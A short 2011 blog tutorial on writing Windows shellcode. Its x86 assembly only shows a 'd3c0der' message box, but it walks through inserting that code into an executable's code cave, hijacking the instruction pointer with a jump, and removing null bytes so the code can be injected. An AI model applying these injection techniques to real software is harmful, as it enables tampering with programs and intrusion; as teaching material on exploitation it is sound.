Tuesday, May 31, 2011

simple windows shellcoding


shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient. However, attempts at replacing the term have not gained wide acceptance. Shellcode is commonly written in machine code.

Shellcode can either be local or remote, depending on whether it gives an attacker control over the machine it runs on (local) or over another machine through a network (remote).

An exploit will commonly inject a shellcode into the target process before or at the same time as it exploits a vulnerability to gain control over the program counter. The program counter is adjusted to point to the shellcode, after which it gets executed and performs its task. Injecting the shellcode is often done by storing the shellcode in data sent over the network to the vulnerable process, by supplying it in a file that is read by the vulnerable process or through the command line or environment in the case of local exploits.

In this post i want to show a simple way to making shellcodes under windows operating system

debuggers can help us to a fast shellcoding and test our shellcodes. do you remember exe file injection method ? in this method we must find a free code area in the exe file ,called code cave.
in the code cave we can insert assembly instructions , and run it! after inserting our codes, we must change the address of instruction pointer to the beginning of our codes address

i want make a MessageBox shellcode that shows d3c0der !

for conversion your message (that you want show by shellcode) to hex ,you can use this site :
http://centricle.com/tools/ascii-hex/

this is an axample of  conversion the " d3c0der " word:





Here is a simple code in assembly language to call the MessageBox function and print a word:

xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx

mov byte ptr ss:[ebp-7],64
mov byte ptr ss:[ebp-6],33
mov byte ptr ss:[ebp-5],63
mov byte ptr ss:[ebp-4],30
mov byte ptr ss:[ebp-3],64
mov byte ptr ss:[ebp-2],65
mov byte ptr ss:[ebp-1],72

push 0
lea ebx,dword ptr ss:[ebp-7]
push ebx
lea ecx,dword ptr ss:[ebp-7]
push ecx
push 0
mov eax,user32.messageboxa
call eax







now it's time to find a codecave area. you just need to look at the end of a binary file:


now i insert my codes into the codecave:


the first instruction that i use is " xor eax,eax "
and this addres is : 01010D47 ( we wiil use it for changing EIP )

take a look at the registers window , and look the instruction pointer address


just follow that address:


and replace the instruction with "JMP 01010D47"


now  run the program , you can see the d3c0der message.


lets make it Null-free!

Most shellcodes are written without the use of null bytes because they are intended to be injected into a target process through null-terminated strings. When a null-terminated string is copied, it will be copied up to and including the first null but subsequent bytes of the shellcode will not be processed. When shellcode that contains nulls is injected in this way, only part of the shellcode would be injected, making it incapable of running successfully.

To produce null-free shellcode from shellcode that contains null bytes, one can substitute machine instructions that contain zeroes with instructions that have the same effect but are free of nulls. For example, on the IA-32 architecture one could replace this instruction:
push 0

which contains zeroes as part of the literal with these instructions:
xor ecx,ecx
push ecx

and our final shellcode is :

xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx
mov byte ptr ss:[ebp-7],64
mov byte ptr ss:[ebp-6],33
mov byte ptr ss:[ebp-5],63
mov byte ptr ss:[ebp-4],30
mov byte ptr ss:[ebp-3],64
mov byte ptr ss:[ebp-2],65
mov byte ptr ss:[ebp-1],72
xor ecx,ecx
push ecx
lea ebx,dword ptr ss:[ebp-7]
push ebx
lea ecx,dword ptr ss:[ebp-7]
push ecx
xor ecx,ecx
push ecx
mov eax,user32.messageboxa
call eax


good luck!